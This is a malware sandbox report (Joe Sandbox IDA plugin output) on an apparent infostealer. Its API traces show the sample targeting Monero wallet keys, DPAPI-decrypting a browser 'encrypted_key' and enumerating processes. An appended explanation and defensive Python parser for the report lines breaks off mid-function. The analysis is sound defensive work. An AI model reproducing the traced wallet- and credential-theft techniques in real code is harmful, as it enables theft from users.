                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                          • Instruction ID: 922582bf5d6269c9307a87f0b82a4a81ca8ac03e21c9380f9b7b24045c087f1e
                          • Opcode Fuzzy Hash: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                          • Instruction Fuzzy Hash: F3910E728105189BDF06FBA4DC96EEE7778AF14304F504268F507BA091EF346A49DBE2
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D801
                          • lstrlen.KERNEL32(00000000), ref: 0038D99F
                          • lstrlen.KERNEL32(00000000), ref: 0038D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0038DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                          • Instruction ID: f3d36959b2809c2997caa072579169486ec5b1cd1aceca1a82d0fa4bb5b3b5b0
                          • Opcode Fuzzy Hash: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                          • Instruction Fuzzy Hash: EA8111729205189BDF06FBA4DC96DEE7778BF14300F504268F507AA091EF346A09DBE2
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003A1580,003A0D92), ref: 0038F54C
                          • lstrlen.KERNEL32(00000000), ref: 0038F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                          • Instruction ID: 3719ad843e5e3d7a7fc1604642f2b2dc8c043dfdf228baf735376802ea49d2f4
                          • Opcode Fuzzy Hash: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                          • Instruction Fuzzy Hash: 4751F171D106089ADF05FBE4DC96DED7778AF54300F408628F816AB191EF346A09DBE2
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0039718C
                          • s9, xrefs: 003972AE, 00397179, 0039717C
                          • s9, xrefs: 00397111
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: s9$s9$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 3722407311-539146638
                          • Opcode ID: fc1b36180251de4b0b18a2e01272086a557ce5a7ddfd7446df07479a99eb48dd
                          • Instruction ID: 13a29dedfaf7068a26bfa7e20c016dfd5947744571fe2821b2d2d78734ea82fa
                          • Opcode Fuzzy Hash: fc1b36180251de4b0b18a2e01272086a557ce5a7ddfd7446df07479a99eb48dd
                          • Instruction Fuzzy Hash: F2517FB1D142189BDF25EBA0DC82BEEB774EF44304F2445A8E2157A1C1EB746E88CF59
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 7c58670bd02fc95b46be8a150549ed2ed965eff4ab2d8fdf60dba7ae3e4ae15a
                          • Instruction ID: 1b1f3bca34cfe747b8235635e2dbc9e1f8b02962d6ef98fb3f25933b74f74ff4
                          • Opcode Fuzzy Hash: 7c58670bd02fc95b46be8a150549ed2ed965eff4ab2d8fdf60dba7ae3e4ae15a
                          • Instruction Fuzzy Hash: 3F411EB1D10109AFDF06EFE4D885AFEB778AB54304F008518E5167B290DB75AA05CFA2
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                            • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                            • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                            • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                            • Part of subcall function 00389B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                            • Part of subcall function 00389B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                            • Part of subcall function 00389B60: LocalFree.KERNEL32(?), ref: 00389BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 67d3a094bfe1eb3865729913c5087636fa7a9c28786d85a6bb994fb425e77923
                          • Instruction ID: c03f1337371a99a25bb9bc689ae4438b8132948c8337c97d65723abbfc17dbb0
                          • Opcode Fuzzy Hash: 67d3a094bfe1eb3865729913c5087636fa7a9c28786d85a6bb994fb425e77923
                          • Instruction Fuzzy Hash: 6F313EB6D10209ABCF05EBE4DC85BFEB7B8AB48304F184559E905A7241EB349A04CBA5
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003A05B7), ref: 003986CA
                          • Process32First.KERNEL32(?,00000128), ref: 003986DE
                          • Process32Next.KERNEL32(?,00000128), ref: 003986F3
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • CloseHandle.KERNEL32(?), ref: 00398761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                          • Instruction ID: e200a4546d09bac8755ca038740d6f7c8204980b92bf94e79bce064a7257520b
                          • Opcode Fuzzy Hash: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                          • Instruction Fuzzy Hash: CF316B71911618ABCF26DF90DC45FEEBBB8FF45700F104299E10AA61A0DB306A45CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E00,00000000,?), ref: 003979B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003979B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,003A0E00,00000000,?), ref: 003979C4
                          • wsprintfA.USER32 ref: 003979F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                          • Instruction ID: 65e07c739a43ce62a096029178ec7b1534f3d1f637dbffe8b0be45d2fe566de1
                          • Opcode Fuzzy Hash: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                          • Instruction Fuzzy Hash: FA1123B2904518ABCB14DFCADD45FBEBBF8FB4CB15F10421AF605A2280E2395944DBB1
                          APIs
                          • __getptd.LIBCMT ref: 0039C74E
                            • Part of subcall function 0039BF9F: __amsg_exit.LIBCMT ref: 0039BFAF
                          • __getptd.LIBCMT ref: 0039C765
                          • __amsg_exit.LIBCMT ref: 0039C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0039C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                          • Instruction ID: 0b502caa1777659a3f1fa81f0ddd8a4ad97179c9ab0871f1e6befd4b4f78c5f0
                          • Opcode Fuzzy Hash: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                          • Instruction Fuzzy Hash: 27F09A32910A009FEF23BBF8A946B5AB3A0AF00720F255249F405AE2D2DB745D409E96
                          APIs
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00394F7A
                          • lstrcat.KERNEL32(?,003A1070), ref: 00394F97
                          • lstrcat.KERNEL32(?,00E392C8), ref: 00394FAB
                          • lstrcat.KERNEL32(?,003A1074), ref: 00394FBD
                            • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                            • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                            • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                            • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                            • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
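                          The API list above is the signature of a file-grabber routine: a base folder is resolved with SHGetFolderPathA (the second argument, 0x1C, is CSIDL_LOCAL_APPDATA), a path is assembled with four lstrcat calls, and the subcall at 00394910 walks that directory with FindFirstFileA / FindNextFileA / FindClose, comparing each entry with StrCmpCA (the two compared strings at 003A0FDC and 003A0FE0 are not shown in the report, so they are not decoded here). The following parser is an added example, not part of the Joe Sandbox report or the sample: it reads the report's own API trace lines (copied from the list above as constructed input), reconstructs the call sequence per function, resolves the CSIDL value, and flags the FindFirstFile/FindNextFile/FindClose enumeration pattern. The CSIDL table is limited to a few well-known values and the "directory walk" heuristic is an assumption of this example, not a rule used by the sandbox.

```python
import re
from collections import Counter, defaultdict

# Constructed input: the "APIs" lines of the function entry above, copied
# verbatim from the report so the parser runs offline.
REPORT_LINES = """
• Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
• lstrcat.KERNEL32(?,00000000), ref: 00394F7A
• lstrcat.KERNEL32(?,003A1070), ref: 00394F97
• lstrcat.KERNEL32(?,00E392C8), ref: 00394FAB
• lstrcat.KERNEL32(?,003A1074), ref: 00394FBD
• Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
• Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
• Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
• Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
• Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
• Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
""".strip().splitlines()

# One report line: optional "Part of subcall function XXXXXXXX: " prefix,
# "Api.MODULE", an optional "(arg,arg,...)" list (wsprintfA has none),
# then ", ref: XXXXXXXX" (the comma is absent when there is no arg list).
LINE_RE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Well-known CSIDL values for SHGetFolderPath (assumption: only these few
# are needed for this example; unknown values are printed as hex).
CSIDL_NAMES = {
    0x00: "CSIDL_DESKTOP",
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x28: "CSIDL_PROFILE",
}


def parse_api_lines(lines):
    """Turn report lines into dicts; non-matching lines (headings) are skipped."""
    calls = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "subcall": m.group("sub"),   # None = called directly by this function
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def strip_aw(name):
    """Drop the ANSI/Unicode suffix so FindFirstFileA and FindFirstFileW compare equal."""
    return re.sub(r"[AW]$", "", name)


def api_counts(calls):
    return Counter(c["api"] for c in calls)


def calls_by_function(calls):
    """Group calls by the function that issues them ("self" = the entry itself)."""
    groups = defaultdict(list)
    for c in calls:
        groups[c["subcall"] or "self"].append(c["api"])
    return dict(groups)


def folder_roots(calls):
    """Resolve the CSIDL argument (second stack slot) of every SHGetFolderPath* call."""
    roots = []
    for c in calls:
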